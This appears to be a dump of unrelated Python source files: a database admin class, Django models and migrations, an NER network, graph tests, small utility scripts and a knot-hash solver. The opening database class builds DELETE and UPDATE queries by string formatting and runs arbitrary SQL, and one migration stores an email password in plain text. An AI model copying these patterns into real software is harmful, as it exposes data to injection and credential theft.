query = 'UPDATE question SET status=2 WHERE question_id = \'{}\';'.format(qid)
self.writeLog("ADMIN", query)
cur.execute(query)
self._send_webhook("질문수정", "QuestionID: {}\n\n관리자에 의해 질문이 오류로 표기되었습니다.".format(qid),
"{}".format(nick), "DB.markQuestion", ip, colour=3092790)
return [False, None]
except Exception as ex:
return [True, str(ex)]
def deleteQuestion(self, qid, nick, ip):
cur = self.getCursor()
try:
query = 'DELETE FROM question WHERE question_id=\'{}\';'.format(qid)
self.writeLog("ADMIN", query)
cur.execute(query)
self._send_webhook("질문삭제", "QuestionID: {}\n\n관리자에 의해 질문이 삭제되었습니다.".format(qid),
"{}".format(nick), "DB.deleteQuestion", ip, colour=13369344)
return [False, None]
except Exception as ex:
return [True, str(ex)]
def deleteProblem(self, pid, nick, ip):
cur = self.getCursor()
try:
query = 'DELETE FROM problem WHERE problem_id=\'{}\';'.format(pid)
self.writeLog("ADMIN", query)
cur.execute(query)
self._send_webhook("문항삭제", "QuestionID: {}\n\n관리자에 의해 질문이 삭제되었습니다.".format(pid),
"{}".format(nick), "DB.deleteProblem", ip, colour=13369344)
return [False, None]
except Exception as ex:
return [True, str(ex)]
def deleteVideo(self, pid, nick, ip):
cur = self.getCursor()
try:
query = 'DELETE FROM solution_video WHERE problem_id=\'{}\';'.format(pid)
self.writeLog("ADMIN", query)
cur.execute(query)
self._send_webhook("영상삭제", "ProblemID: {}\n\n관리자에 의해 영상이 삭제되었습니다.".format(pid),
"{}".format(nick), "DB.deleteVideo", ip, colour=13369344)
return [False, None]
except Exception as ex:
return [True, str(ex)]
def run(self, query):
cur = self.getCursor()
cur.execute(query)
return cur.fetchall()
|
991,248 | 4ac0b8bd83ed4f9e1d5f7423dede83803cc63136 | from django.db import models
class FanPage(models.Model):
name = models.CharField(max_length=100)
def __str__(self):
return self.name
class Article(models.Model):
fanpage = models.ForeignKey(FanPage, on_delete=models.CASCADE)
text = models.TextField()
time = models.DateTimeField()
url = models.URLField(max_length=2000)
read = models.BooleanField(default=False)
starred = models.BooleanField(default=False)
def __str__(self):
return f'{self.fanpage}, {self.time}'
|
991,249 | 62f79e1708785d6eacd7eda0edde2e1da8fa202b | # Copyright 2017 Neural Networks and Deep Learning lab, MIPT
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from logging import getLogger
from typing import Tuple
import numpy as np
import tensorflow as tf
from deeppavlov.core.common.registry import register
from deeppavlov.core.layers.tf_layers import cudnn_bi_lstm, cudnn_bi_gru, bi_rnn, stacked_cnn, INITIALIZER
from deeppavlov.core.layers.tf_layers import embedding_layer, character_embedding_network, variational_dropout
from deeppavlov.core.models.tf_model import LRScheduledTFModel
log = getLogger(__name__)
@register('ner')
class NerNetwork(LRScheduledTFModel):
"""
The :class:`~deeppavlov.models.ner.network.NerNetwork` is for Neural Named Entity Recognition and Slot Filling.
Parameters:
n_tags: Number of tags in the tag vocabulary.
token_emb_dim: Dimensionality of token embeddings, needed if embedding matrix is not provided.
char_emb_dim: Dimensionality of token embeddings.
capitalization_dim : Dimensionality of capitalization features, if they are provided.
pos_features_dim: Dimensionality of POS features, if they are provided.
additional_features: Some other features.
net_type: Type of the network, either ``'rnn'`` or ``'cnn'``.
cell_type: Type of the cell in RNN, either ``'lstm'`` or ``'gru'``.
use_cudnn_rnn: Whether to use CUDNN implementation of RNN.
two_dense_on_top: Additional dense layer before predictions.
n_hidden_list: A list of output feature dimensionality for each layer. A value (100, 200) means that there will
be two layers with 100 and 200 units, respectively.
cnn_filter_width: The width of the convolutional kernel for Convolutional Neural Networks.
use_crf: Whether to use Conditional Random Fields on top of the network (recommended).
token_emb_mat: Token embeddings matrix.
char_emb_mat: Character embeddings matrix.
use_batch_norm: Whether to use Batch Normalization or not. Affects only CNN networks.
dropout_keep_prob: Probability of keeping the hidden state, values from 0 to 1. 0.5 works well in most cases.
embeddings_dropout: Whether to use dropout on embeddings or not.
top_dropout: Whether to use dropout on output units of the network or not.
intra_layer_dropout: Whether to use dropout between layers or not.
l2_reg: L2 norm regularization for all kernels.
gpu: Number of gpu to use.
seed: Random seed.
"""
GRAPH_PARAMS = ["n_tags", # TODO: add check
"char_emb_dim",
"capitalization_dim",
"additional_features",
"use_char_embeddings",
"additional_features",
"net_type",
"cell_type",
"char_filter_width",
"cell_type"]
def __init__(self,
n_tags: int, # Features dimensions
token_emb_dim: int = None,
char_emb_dim: int = None,
capitalization_dim: int = None,
pos_features_dim: int = None,
additional_features: int = None,
net_type: str = 'rnn', # Net architecture
cell_type: str = 'lstm',
use_cudnn_rnn: bool = False,
two_dense_on_top: bool = False,
n_hidden_list: Tuple[int] = (128,),
cnn_filter_width: int = 7,
use_crf: bool = False,
token_emb_mat: np.ndarray = None,
char_emb_mat: np.ndarray = None,
use_batch_norm: bool = False,
dropout_keep_prob: float = 0.5, # Regularization
embeddings_dropout: bool = False,
top_dropout: bool = False,
intra_layer_dropout: bool = False,
l2_reg: float = 0.0,
gpu: int = None,
seed: int = None,
**kwargs) -> None:
tf.set_random_seed(seed)
np.random.seed(seed)
assert n_tags != 0, 'Number of classes equal 0! It seems that vocabularies is not loaded.' \
' Check that all vocabulary files are downloaded!'
if 'learning_rate_drop_div' not in kwargs:
kwargs['learning_rate_drop_div'] = 10.0
if 'learning_rate_drop_patience' not in kwargs:
kwargs['learning_rate_drop_patience'] = 5.0
if 'clip_norm' not in kwargs:
kwargs['clip_norm'] = 5.0
super().__init__(**kwargs)
self._add_training_placeholders(dropout_keep_prob)
self._xs_ph_list = []
self._y_ph = tf.placeholder(tf.int32, [None, None], name='y_ph')
self._input_features = []
# ================ Building input features =================
# Token embeddings
self._add_word_embeddings(token_emb_mat, token_emb_dim)
# Masks for different lengths utterances
self.mask_ph = self._add_mask()
# Char embeddings using highway CNN with max pooling
if char_emb_mat is not None and char_emb_dim is not None:
self._add_char_embeddings(char_emb_mat)
# Capitalization features
if capitalization_dim is not None:
self._add_capitalization(capitalization_dim)
# Part of speech features
if pos_features_dim is not None:
self._add_pos(pos_features_dim)
# Anything you want
if additional_features is not None:
self._add_additional_features(additional_features)
features = tf.concat(self._input_features, axis=2)
if embeddings_dropout:
features = variational_dropout(features, self._dropout_ph)
# ================== Building the network ==================
if net_type == 'rnn':
if use_cudnn_rnn:
if l2_reg > 0:
log.warning('cuDNN RNN are not l2 regularizable')
units = self._build_cudnn_rnn(features, n_hidden_list, cell_type, intra_layer_dropout, self.mask_ph)
else:
units = self._build_rnn(features, n_hidden_list, cell_type, intra_layer_dropout, self.mask_ph)
elif net_type == 'cnn':
units = self._build_cnn(features, n_hidden_list, cnn_filter_width, use_batch_norm)
self._logits = self._build_top(units, n_tags, n_hidden_list[-1], top_dropout, two_dense_on_top)
self.train_op, self.loss = self._build_train_predict(self._logits, self.mask_ph, n_tags,
use_crf, l2_reg)
self.predict = self.predict_crf if use_crf else self.predict_no_crf
# ================= Initialize the session =================
sess_config = tf.ConfigProto(allow_soft_placement=True)
sess_config.gpu_options.allow_growth = True
if gpu is not None:
sess_config.gpu_options.visible_device_list = str(gpu)
self.sess = tf.Session(config=sess_config)
self.sess.run(tf.global_variables_initializer())
self.load()
def _add_training_placeholders(self, dropout_keep_prob):
self._dropout_ph = tf.placeholder_with_default(dropout_keep_prob, shape=[], name='dropout')
self.training_ph = tf.placeholder_with_default(False, shape=[], name='is_training')
def _add_word_embeddings(self, token_emb_mat, token_emb_dim=None):
if token_emb_mat is None:
token_ph = tf.placeholder(tf.float32, [None, None, token_emb_dim], name='Token_Ind_ph')
emb = token_ph
else:
token_ph = tf.placeholder(tf.int32, [None, None], name='Token_Ind_ph')
emb = embedding_layer(token_ph, token_emb_mat)
self._xs_ph_list.append(token_ph)
self._input_features.append(emb)
def _add_mask(self):
mask_ph = tf.placeholder(tf.float32, [None, None], name='Mask_ph')
self._xs_ph_list.append(mask_ph)
return mask_ph
def _add_char_embeddings(self, char_emb_mat):
character_indices_ph = tf.placeholder(tf.int32, [None, None, None], name='Char_ph')
char_embs = character_embedding_network(character_indices_ph, emb_mat=char_emb_mat)
self._xs_ph_list.append(character_indices_ph)
self._input_features.append(char_embs)
def _add_capitalization(self, capitalization_dim):
capitalization_ph = tf.placeholder(tf.float32, [None, None, capitalization_dim], name='Capitalization_ph')
self._xs_ph_list.append(capitalization_ph)
self._input_features.append(capitalization_ph)
def _add_pos(self, pos_features_dim):
pos_ph = tf.placeholder(tf.float32, [None, None, pos_features_dim], name='POS_ph')
self._xs_ph_list.append(pos_ph)
self._input_features.append(pos_ph)
def _add_additional_features(self, features_list):
for feature, dim in features_list:
feat_ph = tf.placeholder(tf.float32, [None, None, dim], name=feature + '_ph')
self._xs_ph_list.append(feat_ph)
self._input_features.append(feat_ph)
def _build_cudnn_rnn(self, units, n_hidden_list, cell_type, intra_layer_dropout, mask):
sequence_lengths = tf.to_int32(tf.reduce_sum(mask, axis=1))
for n, n_hidden in enumerate(n_hidden_list):
with tf.variable_scope(cell_type.upper() + '_' + str(n)):
if cell_type.lower() == 'lstm':
units, _ = cudnn_bi_lstm(units, n_hidden, sequence_lengths)
elif cell_type.lower() == 'gru':
units, _ = cudnn_bi_gru(units, n_hidden, sequence_lengths)
else:
raise RuntimeError('Wrong cell type "{}"! Only "gru" and "lstm"!'.format(cell_type))
units = tf.concat(units, -1)
if intra_layer_dropout and n != len(n_hidden_list) - 1:
units = variational_dropout(units, self._dropout_ph)
return units
def _build_rnn(self, units, n_hidden_list, cell_type, intra_layer_dropout, mask):
sequence_lengths = tf.to_int32(tf.reduce_sum(mask, axis=1))
for n, n_hidden in enumerate(n_hidden_list):
units, _ = bi_rnn(units, n_hidden, cell_type=cell_type,
seq_lengths=sequence_lengths, name='Layer_' + str(n))
units = tf.concat(units, -1)
if intra_layer_dropout and n != len(n_hidden_list) - 1:
units = variational_dropout(units, self._dropout_ph)
return units
def _build_cnn(self, units, n_hidden_list, cnn_filter_width, use_batch_norm):
units = stacked_cnn(units, n_hidden_list, cnn_filter_width, use_batch_norm, training_ph=self.training_ph)
return units
def _build_top(self, units, n_tags, n_hididden, top_dropout, two_dense_on_top):
if top_dropout:
units = variational_dropout(units, self._dropout_ph)
if two_dense_on_top:
units = tf.layers.dense(units, n_hididden, activation=tf.nn.relu,
kernel_initializer=INITIALIZER(),
kernel_regularizer=tf.nn.l2_loss)
logits = tf.layers.dense(units, n_tags, activation=None,
kernel_initializer=INITIALIZER(),
kernel_regularizer=tf.nn.l2_loss)
return logits
def _build_train_predict(self, logits, mask, n_tags, use_crf, l2_reg):
if use_crf:
sequence_lengths = tf.reduce_sum(mask, axis=1)
log_likelihood, transition_params = tf.contrib.crf.crf_log_likelihood(logits, self._y_ph, sequence_lengths)
loss_tensor = -log_likelihood
self._transition_params = transition_params
else:
ground_truth_labels = tf.one_hot(self._y_ph, n_tags)
loss_tensor = tf.nn.softmax_cross_entropy_with_logits(labels=ground_truth_labels, logits=logits)
loss_tensor = loss_tensor * mask
self._y_pred = tf.argmax(logits, axis=-1)
loss = tf.reduce_mean(loss_tensor)
# L2 regularization
if l2_reg > 0:
loss += l2_reg * tf.reduce_sum(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))
train_op = self.get_train_op(loss)
return train_op, loss
def predict_no_crf(self, xs):
feed_dict = self._fill_feed_dict(xs)
pred_idxs, mask = self.sess.run([self._y_pred, self.mask_ph], feed_dict)
# Filter by sequece length
sequence_lengths = np.sum(mask, axis=1).astype(np.int32)
pred = []
for utt, l in zip(pred_idxs, sequence_lengths):
pred.append(utt[:l])
return pred
def predict_crf(self, xs):
feed_dict = self._fill_feed_dict(xs)
logits, trans_params, mask = self.sess.run([self._logits,
self._transition_params,
self.mask_ph],
feed_dict=feed_dict)
sequence_lengths = np.maximum(np.sum(mask, axis=1).astype(np.int32), 1)
# iterate over the sentences because no batching in viterbi_decode
y_pred = []
for logit, sequence_length in zip(logits, sequence_lengths):
logit = logit[:int(sequence_length)] # keep only the valid steps
viterbi_seq, viterbi_score = tf.contrib.crf.viterbi_decode(logit, trans_params)
y_pred += [viterbi_seq]
return y_pred
def _fill_feed_dict(self, xs, y=None, train=False):
assert len(xs) == len(self._xs_ph_list)
xs = list(xs)
xs[0] = np.array(xs[0])
feed_dict = {ph: x for ph, x in zip(self._xs_ph_list, xs)}
if y is not None:
feed_dict[self._y_ph] = y
feed_dict[self.training_ph] = train
if not train:
feed_dict[self._dropout_ph] = 1.0
return feed_dict
def __call__(self, *args, **kwargs):
if len(args[0]) == 0 or (len(args[0]) == 1 and len(args[0][0]) == 0):
return []
return self.predict(args)
def train_on_batch(self, *args):
*xs, y = args
feed_dict = self._fill_feed_dict(xs, y, train=True)
_, loss_value = self.sess.run([self.train_op, self.loss], feed_dict)
return {'loss': loss_value,
'learning_rate': self.get_learning_rate(),
'momentum': self.get_momentum()}
def process_event(self, event_name, data):
super().process_event(event_name, data)
|
991,250 | 6bf50364d8153e8509974dc773a94e64c5c98ce4 | import os
import pytest
import hetio.hetnet
import hetio.readwrite
from .readwrite_test import formats, extensions
def test_creation(tmpdir):
# Convert py._path.local.LocalPath to a string
tmpdir = str(tmpdir)
# Construct metagraph
metaedge_tuples = [
('compound', 'disease', 'treats', 'both'),
('disease', 'gene', 'associates', 'both'),
('compound', 'gene', 'targets', 'both'),
('gene', 'gene', 'interacts', 'both'),
('gene', 'gene', 'transcribes', 'forward'),
]
metanode_ids = 'compound', 'disease', 'gene'
metagraph = hetio.hetnet.MetaGraph.from_edge_tuples(metaedge_tuples)
# check that nodes got added to metagraph_node_dict
assert frozenset(metagraph.node_dict) == frozenset(metanode_ids)
for metanode in metagraph.node_dict.values():
assert isinstance(metanode, hetio.hetnet.MetaNode)
# check that metanode.get_id() and hash(metanode) are working as expected
for metanode_id in metanode_ids:
metanode = metagraph.node_dict[metanode_id]
assert metanode.identifier == metanode_id
assert metanode.get_id() == metanode_id
assert hash(metanode) == hash(metanode_id)
# Check metanode and metaedge counts
assert metagraph.n_nodes == len(metanode_ids)
assert metagraph.n_edges == len(metaedge_tuples)
assert metagraph.n_inverts == 4
# Create a graph
graph = hetio.hetnet.Graph(metagraph)
# Create a node for multiple sclerosis
ms = graph.add_node('disease', 'DOID:2377', 'multiple sclerosis')
assert ms.metanode.identifier == 'disease'
assert ms.identifier == 'DOID:2377'
assert ms.name == 'multiple sclerosis'
assert ms.get_id() == ('disease', 'DOID:2377')
# Create gene nodes
IL7R = graph.add_node('gene', 3575, 'IL7R')
SPI1 = graph.add_node('gene', 6688, name='SPI1',
data={'description': 'Spi-1 proto-oncogene'})
# Attempt to add a duplicate node
with pytest.raises(AssertionError):
graph.add_node('gene', 3575, 'IL7R')
# Misordered node creation arguments
with pytest.raises(KeyError):
graph.add_node('DOID:2377', 'multiple sclerosis', 'disease')
graph.add_edge(IL7R.get_id(), SPI1.get_id(), 'transcribes', 'forward')
graph.add_edge(IL7R, SPI1.get_id(), 'interacts', 'both')
graph.add_edge(ms.get_id(), IL7R, 'associates', 'both')
# Enable in future to check that creating a duplicate edge throws an error
with pytest.raises(AssertionError):
graph.add_edge(IL7R, SPI1, 'transcribes', 'forward')
# excinfo.match(r'edge already exists') # Disabled since new pytest feature
with pytest.raises(AssertionError):
graph.add_edge(SPI1, IL7R, 'transcribes', 'backward')
# Add bidirectional self loop
graph.add_edge(IL7R, IL7R, 'interacts', 'both')
# Test node and edge counts
assert graph.n_nodes == 3
assert graph.n_edges == 4
assert graph.n_inverts == 3
assert graph.n_nodes == len(list(graph.get_nodes()))
assert graph.n_edges == len(list(graph.get_edges(exclude_inverts=True)))
assert (graph.n_edges + graph.n_inverts ==
len(list(graph.get_edges(exclude_inverts=False))))
# Test writing then reading graph
for extension in extensions:
for format_ in formats:
ext = '.{}{}'.format(format_, extension)
# Write metagraph
path = os.path.join(tmpdir, 'metagraph' + ext)
hetio.readwrite.write_metagraph(metagraph, path)
hetio.readwrite.read_metagraph(path)
# Write graph
path = os.path.join(tmpdir, 'graph' + ext)
hetio.readwrite.write_graph(graph, path)
hetio.readwrite.read_graph(path)
def test_disase_gene_example():
"""
Recreate hetnet from https://doi.org/10.1371/journal.pcbi.1004259.g002.
"""
metaedge_id_GaD = 'Gene', 'Disease', 'association', 'both'
metaedge_tuples = [
metaedge_id_GaD,
('Gene', 'Tissue', 'expression', 'both'),
('Disease', 'Tissue', 'localization', 'both'),
('Gene', 'Gene', 'interaction', 'both'),
]
metagraph = hetio.hetnet.MetaGraph.from_edge_tuples(metaedge_tuples)
# Test metagraph getter methods
# Test metagraph.get_metanode
gene_metanode = metagraph.node_dict['Gene']
assert metagraph.get_metanode(gene_metanode) == gene_metanode
assert metagraph.get_metanode('Gene') == gene_metanode
assert metagraph.get_metanode('G') == gene_metanode
# Test metagraph.get_metaedge
metaedge_GaD = metagraph.get_edge(metaedge_id_GaD)
assert metagraph.get_metaedge(metaedge_GaD) == metaedge_GaD
assert metaedge_id_GaD == metaedge_GaD.get_id()
assert metagraph.get_metaedge(metaedge_id_GaD) == metaedge_GaD
assert metagraph.get_metaedge('GaD') == metaedge_GaD
# Test metaedge.abbrev property
assert metaedge_GaD.abbrev == 'GaD'
# Test metagraph.get_metapath
metapath_abbrev = 'TlDaGiG'
metapath = metagraph.metapath_from_abbrev(metapath_abbrev)
assert metagraph.get_metapath(metapath) == metapath
assert metagraph.get_metapath(metapath_abbrev) == metapath
assert metagraph.get_metapath(metapath.edges) == metapath
# Test metapath.abbrev property
assert metapath.abbrev == metapath_abbrev
# Create graph
graph = hetio.hetnet.Graph(metagraph)
nodes = dict()
# Add gene nodes
for symbol in ['STAT3', 'IRF1', 'SUMO1', 'IL2RA', 'IRF8', 'ITCH', 'CXCR4']:
node = graph.add_node('Gene', symbol)
nodes[symbol] = node
# Add tissue nodes
for tissue in ['Lung', 'Leukocyte']:
node = graph.add_node('Tissue', tissue)
nodes[tissue] = node
# Add disease nodes
for disease in ["Crohn's Disease", 'Multiple Sclerosis']:
node = graph.add_node('Disease', disease)
nodes[disease] = node
assert graph.n_nodes == 11
# Add GiG edges
graph.add_edge(nodes['IRF1'], nodes['SUMO1'], 'interaction', 'both')
graph.add_edge(nodes['IRF1'], nodes['IL2RA'], 'interaction', 'both')
graph.add_edge(nodes['IRF1'], nodes['IRF8'], 'interaction', 'both')
graph.add_edge(nodes['IRF1'], nodes['CXCR4'], 'interaction', 'both')
graph.add_edge(nodes['ITCH'], nodes['CXCR4'], 'interaction', 'both')
# Add GaD edges
meta = 'association', 'both'
graph.add_edge(nodes['IRF1'], nodes["Crohn's Disease"], *meta)
graph.add_edge(nodes["Crohn's Disease"], nodes['STAT3'], *meta)
graph.add_edge(nodes['STAT3'], nodes['Multiple Sclerosis'], *meta)
graph.add_edge(nodes['IL2RA'], nodes['Multiple Sclerosis'], *meta)
graph.add_edge(nodes['IRF8'], nodes['Multiple Sclerosis'], *meta)
graph.add_edge(nodes['CXCR4'], nodes['Multiple Sclerosis'], *meta)
# Add TeG edges
graph.add_edge(nodes['IRF1'], nodes["Lung"], 'expression', 'both')
graph.add_edge(nodes['IRF1'], nodes["Leukocyte"], 'expression', 'both')
# Add DlT edges
graph.add_edge(nodes['Multiple Sclerosis'], nodes["Leukocyte"],
'localization', 'both')
assert graph.n_edges == 14
assert graph.count_nodes('Disease') == 2
assert graph.count_nodes(gene_metanode) == 7
|
991,251 | 1cfab9f015f23eb9965d8431f9d16cd6519ae972 | #moving files from my desktop to a
#specific folder on my desktop
import os
import shutil
#Be sure to be in the directory your python program is in before running
sourcePath = '/Path/To/Your/Source'
source = os.listdir(sourcePath)
destinationPath = '/Destination/You/Want/Your/File/Moved/To'
def scanAndMoveFiles():
#check for file exstensions
for files in source:
if files.endswith('.png') or files.endswith('.gif') or files.endswith('.mp4') or files.endswith('JPG') or files.endswith('jpg') or files.endswith('.pdf'):
#then move them
shutil.move(os.path.join(sourcePath, files), os.path.join(destinationPath,files))
#call the method
scanAndMoveFiles()
#Just for confirmation that the program ran
print 'all your files have been moved'
|
991,252 | c3b3ffed6825b3158830baabb629d608dd63fc4c | import asyncio, random
import os, io, gettext
import time
from hangupsbot.utils import strip_quotes, text_to_segments
from hangupsbot.commands import command
import appdirs
### NOTAS ###
@command.register
def recuerda(bot, event, *args):
"""Guarda un mensaje en la libreta de notas\nUso: <bot> recuerda [nota]"""
arg = ' '.join(args)
dirs = appdirs.AppDirs('hangupsbot', 'hangupsbot')
nota= str(os.path.join(dirs.user_data_dir))+"/"+str(event.user_id.chat_id)+".txt"
if os.path.isfile(nota):
text='queso'
else:
os.mknod(nota)
f = open(nota,'r+')
s=time.ctime()
msg= str((s+'\n[{}]\n'+'{}'+'\n\n').format(event.user.full_name,arg))
f.write(msg)
f.readlines()
f.close()
yield from event.conv.send_message(text_to_segments('Guardado'))
@command.register
def notas(bot, event, *args):
"""Muestra las notas guardadas \n Uso: <bot> notas"""
dirs = appdirs.AppDirs('hangupsbot', 'hangupsbot')
nota= str(os.path.join(dirs.user_data_dir))+"/"+str(event.user_id.chat_id)+".txt"
if os.path.isfile(nota):
text='queso'
else:
os.mknod(nota)
f = open(nota,'r+')
text= 'Notas:\n'
r=f.readlines()
for line in r:
text= _(text+line)
f.close()
yield from event.conv.send_message(text_to_segments(text))
@command.register(admin=True)
def deletenotas(bot, event, *args):
"""Borra la libreta de notas (Solo admins)\n Uso: <bot> deletenotas"""
dirs = appdirs.AppDirs('hangupsbot', 'hangupsbot')
nota= str(os.path.join(dirs.user_data_dir))+"/"+str(event.user_id.chat_id)+".txt"
arg = ' '.join(args)
if os.path.isfile(nota):
text='queso'
else:
os.mknod(nota)
f = open(nota,'w')
f.write(' ')
f.close()
yield from event.conv.send_message(text_to_segments('Borradas todas las notas'))
|
991,253 | cb633ac84da15cfe4181bc30f0067dd1e75ae320 | # Generated by Django 2.2.1 on 2019-06-08 01:31
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='About',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(max_length=10000)),
],
options={
'verbose_name': 'About',
'verbose_name_plural': 'About us',
},
),
migrations.CreateModel(
name='ContactUs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField()),
],
options={
'verbose_name': 'Contact us',
'verbose_name_plural': 'Contact us',
},
),
migrations.CreateModel(
name='EmailSettings',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('full_email', models.CharField(default=None, max_length=60)),
('email_host', models.CharField(max_length=40)),
('email_port', models.PositiveIntegerField()),
('email_host_user', models.CharField(max_length=50)),
('email_host_password', models.CharField(max_length=50)),
('email_use_ssl', models.BooleanField(default=True)),
],
options={
'verbose_name': 'Email settings',
'verbose_name_plural': 'Email settings',
},
),
migrations.CreateModel(
name='Guide',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(max_length=100000)),
],
options={
'verbose_name': 'Tenancy guide',
'verbose_name_plural': 'Tenancy guide',
},
),
migrations.CreateModel(
name='MainPageInfo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('image', models.ImageField(default=False, upload_to='media/main_page')),
('description', models.TextField()),
],
options={
'verbose_name': 'Main page info',
'verbose_name_plural': 'Main page info',
},
),
migrations.CreateModel(
name='MottoEmailPhone',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('motto', models.CharField(default='Your future starts with us', max_length=100)),
('email', models.EmailField(max_length=254)),
('phone', models.CharField(default='(09) 215 1267', max_length=18)),
('facebook', models.URLField(default='http://facebook.com')),
('linkedin', models.URLField(default='http://linkedin.com')),
],
options={
'verbose_name': 'Motto, email, and phone number',
'verbose_name_plural': 'Motto, email, and phone number',
},
),
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('email', models.EmailField(max_length=254)),
('phone', models.CharField(max_length=15)),
('about', models.TextField(max_length=1000)),
('image', models.ImageField(default=None, upload_to='media/personnel/')),
],
options={
'verbose_name': 'Person',
'verbose_name_plural': 'People',
},
),
migrations.CreateModel(
name='Services',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('description', models.TextField(max_length=2000)),
],
options={
'verbose_name': 'Service',
'verbose_name_plural': 'Services',
},
),
migrations.CreateModel(
name='WhyUs',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.TextField(max_length=3000)),
],
options={
'verbose_name': 'Why McDonald Property?',
'verbose_name_plural': 'Why McDonald Property?',
},
),
]
|
991,254 | 05941d7c4ba5c357b08c0bdfa682925299f90b3f | def gcd(a, b):
if(a % b == 0):
return b
return gcd(b, a % b)
import sys
out = sys.stdout
sys.stdin = open('toral.in', 'r')
sys.stdout = open('toral.out', 'w')
s = raw_input().split()
n = int(s[0])
m = int(s[1])
print(gcd(n, m)) |
991,255 | f173af4a87bffc6ec97d428ffa2425241f2e686e | from __future__ import annotations
import sqlite3
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Tuple, Union
from lib.classifier.datasets import Category
@dataclass
class PostsEntry:
id: str
prediction: Category
probability: float
@classmethod
def from_db_entry(cls, entry: Tuple[str, int, float]) -> PostsEntry:
id, prediction_target, probability = entry
return cls(
id=id,
prediction=Category.from_target(prediction_target),
probability=probability,
)
def as_db_entry(self) -> Tuple[str, int, float]:
return (self.id, self.prediction.as_target(), self.probability)
class PostsDb:
_connection: sqlite3.Connection
_cursor: sqlite3.Cursor
def __init__(self, connection: sqlite3.Connection, cursor: sqlite3.Cursor) -> None:
self._connection = connection
self._cursor = cursor
@classmethod
def from_file_else_create(cls, db_path: Path) -> PostsDb:
try:
db = cls.from_file(db_path)
except FileNotFoundError:
db = cls.create(db_path)
return db
@classmethod
def from_file(cls, db_path: Path) -> PostsDb:
if not db_path.exists():
raise FileNotFoundError()
connection = sqlite3.connect(db_path)
cursor = connection.cursor()
return cls(connection, cursor)
@classmethod
def create(cls, db_path: Union[str, Path]) -> PostsDb:
# Ignore special case
if db_path != ":memory:":
# Create directory if needed
db_path = Path(db_path)
db_path.parent.mkdir(exist_ok=True, parents=True)
connection = sqlite3.connect(db_path)
cursor = connection.cursor()
cursor.executescript(
"""
CREATE TABLE posts(
id TEXT NOT NULL PRIMARY KEY,
prediction INTEGER NOT NULL,
probability REAL NOT NULL
)
"""
)
return cls(connection, cursor)
def insert(self, entry: PostsEntry) -> None:
self._cursor.execute("INSERT INTO posts VALUES (?, ?, ?)", entry.as_db_entry())
# This shouldn't be very performance sensitive so just commit on every insertion
self._connection.commit()
def find(self, desired_id: str) -> Optional[PostsEntry]:
self._cursor.execute("SELECT * FROM posts WHERE id=?", (desired_id,))
entries = self._cursor.fetchall()
if len(entries) == 0:
return None
return PostsEntry.from_db_entry(entries[0])
def close(self) -> None:
self._cursor.close()
|
991,256 | 1263d3a3430e7334280e16e29b5d34a05548e422 | from functools import reduce
import binascii
def reverse_circular_sublist(array, start, end):
if end >= start:
wraps=False
else:
wraps = True
if wraps == False:
subarray = array[start:end+1]
else:
subarray = array[start:] + array[:end+1]
subarray.reverse()
ptr = start
i = 0
while i < len(subarray):
array[ptr] = subarray[i]
i += 1
ptr = (ptr+1) % len(array)
return array
def part_1_hash(notched_string, lengths, pos_0, skip_0):
pos = pos_0
skip = skip_0
for length in lengths:
start = pos
end = (start+length-1) % len(notched_string)
if length != 0:
notched_string = reverse_circular_sublist(notched_string,
start,
end)
pos = (pos + length + skip) % len(notched_string)
skip = skip+1
return (notched_string, pos, skip)
def densify_block( sparse_block ):
return reduce( (lambda x,y: x ^ y), sparse_block)
if __name__ == "__main__":
inFile = open("input.txt", "r")
lengths = inFile.readline().strip().split(",")
notched_string = list(range(256))
lengths = [int(length) for length in lengths]
notched_string, pos, skip = part_1_hash(notched_string, lengths, 0, 0)
part1 = notched_string[0] * notched_string[1]
print(f"Part 1: {part1}")
notched_string = list(range(256))
inFile = open("input.txt", "r")
chars = inFile.readline().strip()
# Input for part two is the string lengths as the ascii values of the
# input file characters, plus a few specified extras thrown on
ascii_lengths = [ord(char) for char in chars]
ascii_lengths += [17, 31, 73, 47, 23]
# Then run 64 rounds of the knot hash
pos = 0
skip = 0
for i in range(64):
notched_string, pos, skip = part_1_hash( notched_string,
ascii_lengths,
pos,
skip )
# Then densify 16 sets of 16 number long lists
sparce_blocks = [notched_string[i:i+16] for i in range(0, 256, 16)]
sparce_hashes = [densify_block(sparce_block) for sparce_block in sparce_blocks]
# Finally, report the hash in hexadecimal
part2 = binascii.hexlify(bytes(bytearray(sparce_hashes)))
print( f"Part 2: {part2}" )
|
991,257 | 3eb411f58111baa719f7bfea6f1a96c46133dd79 | # Generated by Django 3.0.6 on 2020-07-11 01:00
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0012_auto_20200710_2050'),
]
operations = [
migrations.AlterField(
model_name='ordencompra',
name='status',
field=models.CharField(default='En espera', max_length=50),
),
]
|
991,258 | 1fa13dc89774890147456f1d663ab603b9e5e13e | # -*- coding: utf-8 -*-
__version__ = '0.1.2'
program_name = 'refseq_masher'
